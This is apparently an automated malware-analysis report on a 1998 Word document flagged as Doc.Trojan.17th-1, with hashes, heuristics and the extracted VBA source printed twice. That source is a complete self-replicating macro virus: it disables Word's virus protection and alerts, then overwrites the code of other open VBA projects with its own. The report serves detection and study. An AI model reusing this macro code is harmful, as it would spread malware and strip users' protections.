Office (OLE) malware analysis — malicious · 533d34ee1eb44f03

MALICIOUS

Office (OLE)

26.0 KB Created: 1999-05-30 10:55:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 003608f86e5aef2ad2b590608841d4c7 SHA-1: 573c2fae6a3a0cea84e890a9b1f1452668d9cf80 SHA-256: 533d34ee1eb44f0341ee05d1e53b91e335668e9d9e10f741cb234463b7437842

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The file is identified as malicious by ClamAV and contains VBA macros. The macro code attempts to disable virus protection and obfuscate its own description, indicating a potential attempt to evade analysis or detection. No specific payload or network activity was directly observed in the provided evidence.

Heuristics 2

ClamAV: Doc.Trojan.17th-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.17th-1
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 814 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	814 bytes
SHA-256: `79386f353a358dfa894d027aaef9b521ee6fdade03029daf9068bf4193fea302`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1�.ThisDocument�" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Copyright (C) 1998 by FlyShadow ~^^~ - 17th Private Sub Document_Close() On Error Resume Next Options.VirusProtection = 0 Options.SaveNormalPrompt = 0 Application.DisplayAlerts = 0 Application.ScreenUpdating = 0 Application.EnableCancelKey = 0 Set α = VBE.VBProjects For ι = 1 To α.Count If α(ι).Protection <> 1 And α(ι).Description <> "17th" Then α(ι).Description = "17th" Set υ = α(ι).VBComponents(1).CodeModule υ.DeleteLines 1, υ.CountOfLines υ.AddFromString VBProject.VBComponents(1).CodeModule.Lines(1, 17) End If: Next End Sub

SHA-256: 79386f353a358dfa894d027aaef9b521ee6fdade03029daf9068bf4193fea302

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1�.ThisDocument�"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - 17th
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Application.DisplayAlerts = 0
Application.ScreenUpdating = 0
Application.EnableCancelKey = 0
Set α = VBE.VBProjects
For ι = 1 To α.Count
If α(ι).Protection <> 1 And α(ι).Description <> "17th" Then
α(ι).Description = "17th"
Set υ = α(ι).VBComponents(1).CodeModule
υ.DeleteLines 1, υ.CountOfLines
υ.AddFromString VBProject.VBComponents(1).CodeModule.Lines(1, 17)
End If: Next
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.